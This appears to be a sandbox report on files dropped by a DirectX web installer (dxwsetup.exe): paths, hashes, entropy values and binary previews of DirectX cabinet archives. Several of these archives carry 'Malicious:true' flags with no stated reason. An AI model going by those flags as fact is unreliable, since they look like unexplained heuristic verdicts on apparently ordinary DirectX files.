                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100360
                                                                                              Entropy (8bit):7.9900557178400815
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
                                                                                              MD5:4AFD7F5C0574A0EFD163740ECB142011
                                                                                              SHA1:3EBCA5343804FE94D50026DA91647442DA084302
                                                                                              SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
                                                                                              SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
                                                                                              Malicious:true
                                                                                              Preview:MSCF....8d......D...............R...........8d...#............................~>.%..dxupdate.dll.02........h=...dxupdate.inf.1...0.....~>.%..dxupdate.cif.T....'..CK.Z}.$.U....;..@.e!.#....G===.=+".?..+.s..l8....o.{....;.+..(...d,..HVd..,......(..[&H.........Y.Y..~..{.gv.vW.'.....^......^...}...1v....2.*.~.......y...a_.....^Z..V?H.Q..bo(..0.Ra...q(..`o....W.....4~...q.?...F.............].....~c...O7^..W..x.?...l.=.~$......'..o;.._.....'u.aK......=..X.........g........~.].[..+..\b._........p.=.....w...%..@.o-.....O2..w...~sn..D_:....G).../e.Q_/....=Y.x........p.0..^....w...A}..'..... ...P.7....3.av...?...Kl.......>t...O`..b.]....x..Y....._...x..}....@.....1.9.o....[.?.......)...g..'.1.i../.^.|..=........x...L.6`...>..,...K./....6...........A.#.?.8.|....?.|......w%K.>@..(.I...9.../....].....%v7.>.....-@.p....E........6...Kc..p?@.....8.|.p/..xg...7...^.(..7..X~?..........#...w...q..U....f.... ..?<.\...}.K.Z.,]+...../..-......e...aO....a9Y......Wg.

                                                                                              C:\Windows\SysWOW64\directx\websetup\filelist.dat

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Generic INItialization configuration [DXUpdate]
                                                                                              Category:dropped
                                                                                              Size (bytes):5597
                                                                                              Entropy (8bit):5.296209668714632
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:1WtNC69hwety7h+IZpL51yFYy9NWzfQo1RaTwzxlWINXWgQ83HSbsO6ctBKi:8NV2ety7h+IZpt1eJ9NWzfxRaTwzxlWx
                                                                                              MD5:4306E31CDC10F214300CE680C17B13B1
                                                                                              SHA1:EB5F75D894789C98ADB67950F31C8093EE5ABF57
                                                                                              SHA-256:A98AFB5653176C7FD18F08AA6E507BBD0670F023D62052800466383EB5F72EE4
                                                                                              SHA-512:C57D7DCD753CBA6BFA4589E3561C70F8DC9AA25CBC39269C8CB6AABE431EED575929EF6CE9E3E53F121F4D9F68484D3C2995CA6795966ADDBF3089D975C47FF3
                                                                                              Malicious:false
                                                                                              Preview:[General]..Version=1..[DXUpdate]..Version=9,29,1962,0..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=100360,dxupdate.cab..[DXUpdate_Apr2006_xinput_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=49218,Apr2006_xinput_x86.cab..[DXUpdate_Apr2006_xinput_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=90309,Apr2006_xinput_x64.cab..[DXUpdate_Aug2006_xinput_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=49266,Aug2006_xinput_x86.cab..[DXUpdate_Aug2006_xinput_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=90350,Aug2006_xinput_x64.cab..[DXUpdate_Dec2006_d3dx10_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=194952,Dec2006_d3dx10_00_x86.cab..[DXUpdate_Dec2006_d3dx10_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=216015,Dec2006_d3dx10_00_x64.cab..[DXUpdate

                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.416731759514638
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:+cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNQ5+:Li58oSWIZBk2MM6AFBWo
                                                                                              MD5:D51F3285E4C42877BC295BE77CA822DE
                                                                                              SHA1:EAA757C3D5767905A88C9A00C4D941290C417484
                                                                                              SHA-256:5F81075A7CC9B52E94813906E94E897C9783F6D3555DC75CA9821296C56AEF74
                                                                                              SHA-512:926A65E16336EF2EE331619211EA4D44DBB6CCDE9432DC3E8A07745B00C7DC4BC27E17404FFD9D2B6170878F3FECB4ECB1A4B3C70F562F073A7D85F30C5AD870
                                                                                              Malicious:false
                                                                                              Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...\]..............................................................................................................................................................................................................................................................................................................................................$J..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Windows\msdownld.tmp\AS6BB1F2.tmp\dxupdate.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100360
                                                                                              Entropy (8bit):7.9900557178400815
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
                                                                                              MD5:4AFD7F5C0574A0EFD163740ECB142011
                                                                                              SHA1:3EBCA5343804FE94D50026DA91647442DA084302
                                                                                              SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
                                                                                              SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
                                                                                              Malicious:true
                                                                                              Preview:MSCF....8d......D...............R...........8d...#............................~>.%..dxupdate.dll.02........h=...dxupdate.inf.1...0.....~>.%..dxupdate.cif.T....'..CK.Z}.$.U....;..@.e!.#....G===.=+".?..+.s..l8....o.{....;.+..(...d,..HVd..,......(..[&H.........Y.Y..~..{.gv.vW.'.....^......^...}...1v....2.*.~.......y...a_.....^Z..V?H.Q..bo(..0.Ra...q(..`o....W.....4~...q.?...F.............].....~c...O7^..W..x.?...l.=.~$......'..o;.._.....'u.aK......=..X.........g........~.].[..+..\b._........p.=.....w...%..@.o-.....O2..w...~sn..D_:....G).../e.Q_/....=Y.x........p.0..^....w...A}..'..... ...P.7....3.av...?...Kl.......>t...O`..b.]....x..Y....._...x..}....@.....1.9.o....[.?.......)...g..'.1.i../.^.|..=........x...L.6`...>..,...K./....6...........A.#.?.8.|....?.|......w%K.>@..(.I...9.../....].....%v7.>.....-@.p....E........6...Kc..p?@.....8.|.p/..xg...7...^.(..7..X~?..........#...w...q..U....f.... ..?<.\...}.K.Z.,]+...../..-......e...aO....a9Y......Wg.

                                                                                              C:\Windows\msdownld.tmp\AS6C255D.tmp\Apr2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49218
                                                                                              Entropy (8bit):7.962835058038329
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
                                                                                              MD5:E207FB904E641246F3F7234DB74121FC
                                                                                              SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
                                                                                              SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
                                                                                              SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
                                                                                              Malicious:false
                                                                                              Preview:MSCF....r.......D...........................r....#.............................46f .xinput1_1_x86.cat............4.d .xinput1_1.dll............4.e .apr2006_xinput_x86.inf.....R......4.e .xinput1_1_x86.inf...G..>..CK..\SG.8|....&l....-n.6....(Z........"PH..,...+.G.V..b..V....Zm.Z..Xm..ZQ..E.{.......}....&L.g.9s....Jz?tp..N.;.]Y....!...b......t.c..'D%v[...8.8..........F.spf2y,.Gpe.w.......d...o.vs.........G...).bQ....cE%....."..GH.`"....D..B!..i.1..... ..0.. ..K# ...@*...C!M....R....SDq.c...b....#!6....b.....(/.`.....Q....(.!.pE....lB.a....L.M..[..E.........|...;.H!..".P.j........9..<.t.l....]5w.;...R.9qQx...@x..8.........$.1.az!.Z..?.rDP+...c..)U'J..E.H..j....%.......w.;..x.O...>........`0.A4..d.....dT...Q.3..y0.."..].x"...|.C.bs.,...`..h..#D..y.v..OM.1u{..C .X.N......+0....f2...3;...@...P......Z.......H.x.E<....A.-.4OA.Vi.f......."n\....b\...\M+.e.....k.N.q.`....%.@.../Q..V.e...s..."w.......KI........4.u.p..J^.V....D....t.0J...H.HMVg.d....B.v.]..)..

                                                                                              C:\Windows\msdownld.tmp\AS6C2A7D.tmp\Apr2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90309
                                                                                              Entropy (8bit):7.986243949537019
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
                                                                                              MD5:B0669F7D395078BEE0087B089F0B45C5
                                                                                              SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
                                                                                              SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
                                                                                              SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....<......D...............!............<...#.............................44f .xinput1_1_x64.cat..F.........4.d .xinput1_1.dll......e.....4.d .infinst.exe.V....l.....4.e .apr2006_xinput_x64.inf......o.....4.e .xinput1_1_x64.inf.. ...9..CK.{.XSI..MHh..AD.. .7t...4..H.TTB...$.."...,...v].{Y{...u..k.......w..pA..}......<.\.9s.w.9sf.x...}...y..L......j`.c2..6..>..L.i.......F.......QZ...X.p.}c.i.`.,^X/l.8...m._..Fv0.}pOO.................N..>....O 6......X..s....A.'.s0....X...c._0.|...?... .....IM.Ln..e..&..$...6?...K.....f7../.A..2...@=..7.`..L&..u:...w.>...q.q'=&...Sf....'..,.S`R,..aJ..@.nO.6.....TEF+.K...4.-.$....<e........ob.^..\({@).F.A.../.'..I../.F>@}..N.f....h...........q\.7#.~...Rm.2...HO0...{...dx....d..00<.3.v..........d....o:.e...,.....I..^v&.t .O..)Y;.B.7|Q.K....Oo...g.L..5.I.....;t.i.\Z.V..>../..G+.!....z5,.*....1.L..#....58..f....7.x..Va~....bY....\+..U.-M.D..H....d"n{..b.X..V...Lqz..k.h.5..I.d)E..x'.hc.dp.Dr.8E,.(.R..+..5.YZS.1.

                                                                                              C:\Windows\msdownld.tmp\AS6C300B.tmp\Aug2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49266
                                                                                              Entropy (8bit):7.9632460736333766
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
                                                                                              MD5:16B968CA0C435EE45E77A84C2D0364A9
                                                                                              SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
                                                                                              SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
                                                                                              SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
                                                                                              Malicious:false
                                                                                              Preview:MSCF............D................................#.............................4.R .xinput1_2_x86.cat............4.K .xinput1_2.dll............4}R .aug2006_xinput_x86.inf............4}R .xinput1_2_x86.inf.....>..CK.|.\SG..M.. @...mTT.0.(..D..M...+K0 ..D.`...T.Zkk.Am.V..k...V[l...+....*Z4....P..........&w.3g.9..\.Kz<tp..N.;.]Y...%=.!...b.............%v_88.t`qXK.;......B..3..c.8...................a...aA..C..)t...FP.q.%......'.B...("...D0.(..Al(..BY.<..."...s.!...1....&."...a..;6;h.P.#.X...p.H....c..q,..1.'..^.CL..h.C..h.%......f...S.l.'h.p.p.E.......\..G..1..'.)D>.Cd.JB..u.....6..i..A.>...&.......]..J....C..h."........x.......4....0.H.?..P.=.Z"zEaJU...F./...Y.t...~.o.y9<..9.l..7=.9_..d...!.r.F0...4..c2...a.3..y0..B..nD<.K...s!d.9|...p.0|a.U.a.=x.v$.OM.1u{...qQ,..._.R....y..f"...33...@... ......[..1.a.....0.x8..@.N.`i..0...b..c.wYs.L>&..9..A.......UXL.n..8x.....z......W+..... o.'.v.r...$g....R...4.u.r..J.P+......./o:C...Sg.g.&.3r..^.vG.v^...I.s...9..

                                                                                              C:\Windows\msdownld.tmp\AS6C353B.tmp\Aug2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90350
                                                                                              Entropy (8bit):7.985841057262195
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
                                                                                              MD5:A9D582E44E46E36F37EDB7CBC761179D
                                                                                              SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
                                                                                              SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
                                                                                              SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....=......D............................=...#.............................4.R .xinput1_2_x64.cat..G.........4.K .xinput1_2.dll......f.....4.K .infinst.exe.V...'m.....4}R .aug2006_xinput_x64.inf.....}p.....4}R .xinput1_2_x64.inf....%p9..CK.[.\SI.....I..1`D...]A......A....D .)4........E]...`.....^VV.........{.\.]......~./w.9s...9sf.E..k.....l@...Y....*...Cu4.....t......I.Q.<u)ey...k1...K0.)....u..+..{..&...Z....@=].X....'..$q*D...y.kZ.+..O..x .....F.@..........A.wd..........;......<@i.. ..s(G..J..".q.#..c.u...=.H<"A.H..C..;.>....43V.4..1y.;..j.yK"F}.F..#.RY.h.u.2.....p.C...u...b.:..E1.?f........H@]..;..DfR.T.%..-.....h....@...;...Z=@..pGb.b... .........n.....b>...R~...J...X...0.?..P7..........p6."/=.Z mI.r..X..x...ey...m#.>Pi.ZY.".....Xi..B..S.....7....=P7k}L..."bB.....;.....)...;..L...`B.PG.8.d..q....e.E*....D.T.$..H..X.A..,6..y.|..4..*.x...K.....o...6`mB.T+.B..0..[..Q4MS.D?.9j.+...<..'.0.9"...5.l-S...8.#H..XF..puM5#.8.R..7..2.L.p..'....\../.....a....

                                                                                              C:\Windows\msdownld.tmp\AS6C3A9A.tmp\Dec2006_d3dx10_00_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.

                                                                                              C:\Windows\msdownld.tmp\AS6C4047.tmp\Dec2006_d3dx10_00_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):216015
                                                                                              Entropy (8bit):7.996946294916653
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
                                                                                              MD5:681407075E9B19E5EF2218832F6FAD71
                                                                                              SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
                                                                                              SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
                                                                                              SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....'......D............................'...#.............................5#a .d3dx10_00_x64.cat..)........}5.h .d3dx10.dll......H.....5T_ .infinst.exe......O.....5.` .d3dx10_00_x64.inf......Q.....5.` .dec2006_d3dx10_00_x64.inf......:..[.... .Vm.....%A.P...?..,..".._.R.&.F.J.J.K.^.^.*..".U.!. ...BvJ...G......(.........C~.b...V...i.Z..O.<.%. .*C...@l....a........XBq..Q.]g..2;..+d.[T[.Q..(ji..*J...........T%.E.5.o3w.;.x.p.+@...JH...JA%*.`.F..^....z..B......D.....*S. \.3....."A%'n..h.f%.E.Ue.T..61....i.....m.X.......Wu...pf.a...............G.B...........$..%....R...`K.x....U,/...aH........S..^..2....h.E.6....B.K.A..........4!@7..........2...].}...".2..Z...!V.......-.6..<...{}......*........o.~.ST.}.O.H.,....U.N.;..g{j.~a...^..7.n#.......SJ....~3}I9.\s.o....u.c;.../...RT....O~.R......L>C....W...K....P..z..........f%........::...vr.hC.Z.5...75+^...........evQ...8....v..)...W{..O/..<$....t...;. t..,&F.]&@.R..3e._.KZ.....C|../...^.p&..`\SVd.......ge..E.

                                                                                              C:\Windows\msdownld.tmp\AS6C4643.tmp\Apr2007_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):56510
                                                                                              Entropy (8bit):7.973777529821975
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
                                                                                              MD5:B362EC93463D8B6381A864D35D38C512
                                                                                              SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
                                                                                              SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
                                                                                              SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
                                                                                              Malicious:false
                                                                                              Preview:MSCF...........D...............+ ..............#...................(.........6{. .xinput1_3_x86.cat.h?...(.....6.. .xinput1_3.dll......h.....6G. .apr2007_xinput_x86.inf......m.....6G. .xinput1_3_x86.inf./....p.....6G. .xinput1_3_x86_xp.inf.i...T5..CK.y<.....Y.d..H.<3.1....=...`,cbB.f...*R*kB..V..E...,.[$I.R(~g..n........}....<....y>.9.s.....f*&.s)E.F..Cp ..Q...D 0<0.;....R.....3.\...4...F.1QI...........@..O....2.f....I\...a...c4.0.....,...0.!..6.. M...@..:..ocp.A.K6......... .F..!...[....+..,...0n...<..@cl`+Xe^.X.t.$.;{X@.P....@d..N=.....Z..g....&...#...%]....~.........C. #..u...h(.4^.4.... a.a...*#.Z<....%.{..5..n$....P@[..C<01..Y...F.\..[.H.H.l..f.l.X.0...l.4.A....+B.~.|.l.YO0..k}i>~V..O.f...M0n^.?..B..........a.......N.w/==J.{..D@0..Q.....%..@6..Z.|......@@.4..a.....q......t....4v....dI.Ym..^...........[7.XH.8Y.nR..d.<.;O.."k...d.y2aV..4....D...5..B".H~.....+x_o.4....c.#.`..0...v.F4........I.Q$.....x....._..;]...O[....l....?..:.......Q._....2.;.~...NXz

                                                                                              C:\Windows\msdownld.tmp\AS6C4B82.tmp\Apr2007_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.

                                                                                              C:\Windows\msdownld.tmp\AS6C516E.tmp\Feb2005_d3dx9_24_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
